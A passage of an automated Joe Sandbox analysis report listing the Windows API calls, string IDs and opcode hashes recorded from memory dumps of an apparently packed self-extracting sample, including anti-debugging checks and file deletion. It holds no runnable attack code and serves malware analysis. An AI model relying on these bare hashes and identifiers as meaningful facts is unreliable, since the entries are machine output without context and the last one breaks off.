                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                              • API String ID: 3935142422-3508440684
                                                                                                                                              • Opcode ID: 41dfbc80b0c25e39372646784615690bc9f33dfdf6d6720c1faed62a8a76769c
                                                                                                                                              • Instruction ID: 8542ef5018ca1724d1debe75db36301becf2c720bb4b1f3c9acc62c19c5e9043
                                                                                                                                              • Opcode Fuzzy Hash: 41dfbc80b0c25e39372646784615690bc9f33dfdf6d6720c1faed62a8a76769c
                                                                                                                                              • Instruction Fuzzy Hash: 97B103719542999FEB26DF65CC41BEF73B8EF08300F4044A9FA19E7182D770AA65CB60
                                                                                                                                              APIs
                                                                                                                                              • FindResourceW.KERNEL32(00000066,PNG,?,?,002FA54A,00000066), ref: 002F964B
                                                                                                                                              • SizeofResource.KERNEL32(00000000,75845780,?,?,002FA54A,00000066), ref: 002F9663
                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9676
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9681
                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,00000000,?,?,?,002FA54A,00000066), ref: 002F969F
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 002F96AC
                                                                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002F9707
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 002F971C
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 002F9723
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                                                                                                              • String ID: PNG
                                                                                                                                              • API String ID: 4097654274-364855578
                                                                                                                                              • Opcode ID: f79477b759d74d048031182314b473a53b13df5a3ecd109ef21d148cb605c107
                                                                                                                                              • Instruction ID: 6265d4c8d0a17fcbf7872c2a16d6db944029d9af623824addb1e4b32304cd2cd
                                                                                                                                              • Opcode Fuzzy Hash: f79477b759d74d048031182314b473a53b13df5a3ecd109ef21d148cb605c107
                                                                                                                                              • Instruction Fuzzy Hash: 6B217F7152030AABD7269F21DC88E7BFBADEF49790B11453CFA41C2161DB21C864CAA1
                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00307CD9
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00307CE3
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00307CF0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 3906539128-2989149754
                                                                                                                                              • Opcode ID: e1ca0c0fa41f98a2164bcec0212de464b49fc7485c42e34876a0fec480a6349f
                                                                                                                                              • Instruction ID: e9d3388fd8b2ca9c5ac1d5b4f5dc5e2b3b336f5a50779fc25dcbba5da4457cbc
                                                                                                                                              • Opcode Fuzzy Hash: e1ca0c0fa41f98a2164bcec0212de464b49fc7485c42e34876a0fec480a6349f
                                                                                                                                              • Instruction Fuzzy Hash: 3231B374D1121CABCF62DF64D889BDDBBB8AF18310F5041EAE51CA72A0E7709B918F44
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .$S#~>
                                                                                                                                              • API String ID: 0-726359303
                                                                                                                                              • Opcode ID: 928299e867d5d48ee7eeff8d835ce280e4d63291a59ff4f7209c2c5947976572
                                                                                                                                              • Instruction ID: d6e5e8c2d4fdd4bbf97de6d638a837e8d73ea1ad52a17dfb93d154ee7f700475
                                                                                                                                              • Opcode Fuzzy Hash: 928299e867d5d48ee7eeff8d835ce280e4d63291a59ff4f7209c2c5947976572
                                                                                                                                              • Instruction Fuzzy Hash: 053105B190120DAFCB268E78DC94EFB7BBDDF85304F1141A8F419D7292E6309D458B60
                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002F9DBF
                                                                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0031D600,?,?), ref: 002F9E0E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2169056816-0
                                                                                                                                              • Opcode ID: d097885eec3388e29608494710fbc04536640e5480d09c0268036834446a20f8
                                                                                                                                              • Instruction ID: 40936222acc332e657515a9d7f987c08f8970c7e5605bee35c25bc1c930c5a05
                                                                                                                                              • Opcode Fuzzy Hash: d097885eec3388e29608494710fbc04536640e5480d09c0268036834446a20f8
                                                                                                                                              • Instruction Fuzzy Hash: DC017135510218BAD711DFA4EC45FEBB7BCEF4D710F409422FA4897150D37099248BA5
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(002F0DE0,?,00000200), ref: 002E6D06
                                                                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 002E6D27
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                              • Opcode ID: f78019c510c87fab497e05abed6efaa4b3b60123d2b9df9de8cdad06511d0523
                                                                                                                                              • Instruction ID: 89919c7b4ffa8eecf5dc2971af3e1fb8242c7ddbda3982038c6ad8d4a1d20378
                                                                                                                                              • Opcode Fuzzy Hash: f78019c510c87fab497e05abed6efaa4b3b60123d2b9df9de8cdad06511d0523
                                                                                                                                              • Instruction Fuzzy Hash: 4AD09E713D42427AFA110A718C09F667755A769BD2F54CA047256D90D1D57090249619
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001E64F,002FE084), ref: 002FE648
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: 14e2d649e374123645d9b919f6f18c60a4b035536f5528b9c0087129e2ed2a4a
                                                                                                                                              • Instruction ID: abaf8cb054677bd84b7f72105a5c57f4cdfe2f2a75791cb3606cc158888bf156
                                                                                                                                              • Opcode Fuzzy Hash: 14e2d649e374123645d9b919f6f18c60a4b035536f5528b9c0087129e2ed2a4a
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HeapProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                              • Opcode ID: d4662ac6606cc98248754175c1598feb18bf0f2cee014c49be7620c0694e550c
                                                                                                                                              • Instruction ID: 87424156b60654ab7a2bd4f7847951a4ee3cf043654f95a53326d339b26b96a2
                                                                                                                                              • Opcode Fuzzy Hash: d4662ac6606cc98248754175c1598feb18bf0f2cee014c49be7620c0694e550c
                                                                                                                                              • Instruction Fuzzy Hash: 63A001746022119B9B468F36AF0924A3AEDAA4AB91B099169A60ACA164EB3494609A41
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002FB4CC
                                                                                                                                                • Part of subcall function 002FA156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 002FA21E
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,002FADDF,?,00000000), ref: 002FB601
                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 002FB6AE
                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 002FB6BB
                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 002FB6C9
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 002FB812
                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 002FB99C
                                                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 002FB9D7
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 002FB9E7
                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00329602), ref: 002FB9FB
                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002FBA24
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemOperationStrings_wcsrchr
                                                                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                              • API String ID: 764735972-312220925
                                                                                                                                              • Opcode ID: 01c2a4214ac8db9446dff0898015d7f98efdc66ad317bfb094329370b618e917
                                                                                                                                              • Instruction ID: de0d6bb09c51fc8cd3c2e6cef77e2629d532afa1def05ceb2670ba1c9aac569d
                                                                                                                                              • Opcode Fuzzy Hash: 01c2a4214ac8db9446dff0898015d7f98efdc66ad317bfb094329370b618e917
                                                                                                                                              • Instruction Fuzzy Hash: 4DE1737691011DAADF26ABA0DD95EEFB37CAB44390F1040B6F609E7140EF709B958F60
                                                                                                                                              APIs
                                                                                                                                              • _swprintf.LIBCMT ref: 002ED731
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                                • Part of subcall function 002F11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00320078,?,002ECE91,00000000,?,00000050,00320078), ref: 002F1217
                                                                                                                                              • _strlen.LIBCMT ref: 002ED752
                                                                                                                                              • SetDlgItemTextW.USER32(?,0031D154,?), ref: 002ED7B2
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 002ED7EC
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 002ED7F8
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 002ED896
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 002ED8C3
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 002ED906
                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 002ED90E
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 002ED919
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 002ED946
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 002ED9B8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                              • String ID: I=u$$%s:$CAPTION$d
                                                                                                                                              • API String ID: 2407758923-1991495195
                                                                                                                                              • Opcode ID: 987e4e7530749a85ca12463423b9c4157b49eaa2b50c6fc534efa367ec6febaf
                                                                                                                                              • Instruction ID: 9043b229f4d016af959a18e976ae83217928bf5449775a51d56dcebc81c433f5
                                                                                                                                              • Opcode Fuzzy Hash: 987e4e7530749a85ca12463423b9c4157b49eaa2b50c6fc534efa367ec6febaf
                                                                                                                                              • Instruction Fuzzy Hash: C081F072148341AFD711DF69CC88FAFBBE9EB89704F44482DFA8597290C630E9168B52
                                                                                                                                              APIs
                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0030B7C8
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B380
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B392
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3A4
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3B6
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3C8
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3DA
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3EC
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B3FE
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B410
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B422
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B434
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B446
                                                                                                                                                • Part of subcall function 0030B363: _free.LIBCMT ref: 0030B458
                                                                                                                                              • _free.LIBCMT ref: 0030B7BD
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 0030B7DF
                                                                                                                                              • _free.LIBCMT ref: 0030B7F4
                                                                                                                                              • _free.LIBCMT ref: 0030B7FF
                                                                                                                                              • _free.LIBCMT ref: 0030B821
                                                                                                                                              • _free.LIBCMT ref: 0030B834
                                                                                                                                              • _free.LIBCMT ref: 0030B842
                                                                                                                                              • _free.LIBCMT ref: 0030B84D
                                                                                                                                              • _free.LIBCMT ref: 0030B885
                                                                                                                                              • _free.LIBCMT ref: 0030B88C
                                                                                                                                              • _free.LIBCMT ref: 0030B8A9
                                                                                                                                              • _free.LIBCMT ref: 0030B8C1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                              • Opcode ID: dd6cc4e16406af0c5f39734a98075dbaa232dee0f4c872d92bb008f638473aae
                                                                                                                                              • Instruction ID: 1575b3935b4599ff7b60c35f98ef49ddd565d14030ec8c9bdc5178cfbb55dc8b
                                                                                                                                              • Opcode Fuzzy Hash: dd6cc4e16406af0c5f39734a98075dbaa232dee0f4c872d92bb008f638473aae
                                                                                                                                              • Instruction Fuzzy Hash: A0315E31A063419FEB22AA39D855B5BB3F8EF00350F159429E059EB2E1DF30FD808724
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 00308436
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 00308442
                                                                                                                                              • _free.LIBCMT ref: 0030844D
                                                                                                                                              • _free.LIBCMT ref: 00308458
                                                                                                                                              • _free.LIBCMT ref: 00308463
                                                                                                                                              • _free.LIBCMT ref: 0030846E
                                                                                                                                              • _free.LIBCMT ref: 00308479
                                                                                                                                              • _free.LIBCMT ref: 00308484
                                                                                                                                              • _free.LIBCMT ref: 0030848F
                                                                                                                                              • _free.LIBCMT ref: 0030849D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID: K1
                                                                                                                                              • API String ID: 776569668-2791441000
                                                                                                                                              • Opcode ID: 06bf0b60203833463a45d36eaebf938c7821bef1d3a275086842dbb88b3de912
                                                                                                                                              • Instruction ID: bf70a08187bb7eefca498f7644f1c2834efcfa37b2cf9d5d3ff75d9729d8a35a
                                                                                                                                              • Opcode Fuzzy Hash: 06bf0b60203833463a45d36eaebf938c7821bef1d3a275086842dbb88b3de912
                                                                                                                                              • Instruction Fuzzy Hash: 8F119B75A15108FFCB06EF64C852DDE3B75EF04390B5151A5FA194F2A2DA31EF509B80
                                                                                                                                              APIs
                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0030EA62,00000000,00000000,00000000,00000000,00000000,00303FBF), ref: 0030E32F
                                                                                                                                              • __fassign.LIBCMT ref: 0030E3AA
                                                                                                                                              • __fassign.LIBCMT ref: 0030E3C5
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0030E3EB
                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,b0,00000000,?,?,?,?,?,?,?,?,?,0030EA62,00000000), ref: 0030E40A
                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,b0,00000000,?,?,?,?,?,?,?,?,?,0030EA62,00000000), ref: 0030E443
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                              • String ID: S#~>$b0
                                                                                                                                              • API String ID: 1324828854-53534177
                                                                                                                                              • Opcode ID: a3ad37f5982d51785e15aeaf25d4213f5c669a455e8fef6d77d67c255069b7cc
                                                                                                                                              • Instruction ID: 084e236729fc150f78f61b04285b09bb412962c4435c96252ec86cbd5ca5ea6e
                                                                                                                                              • Opcode Fuzzy Hash: a3ad37f5982d51785e15aeaf25d4213f5c669a455e8fef6d77d67c255069b7cc
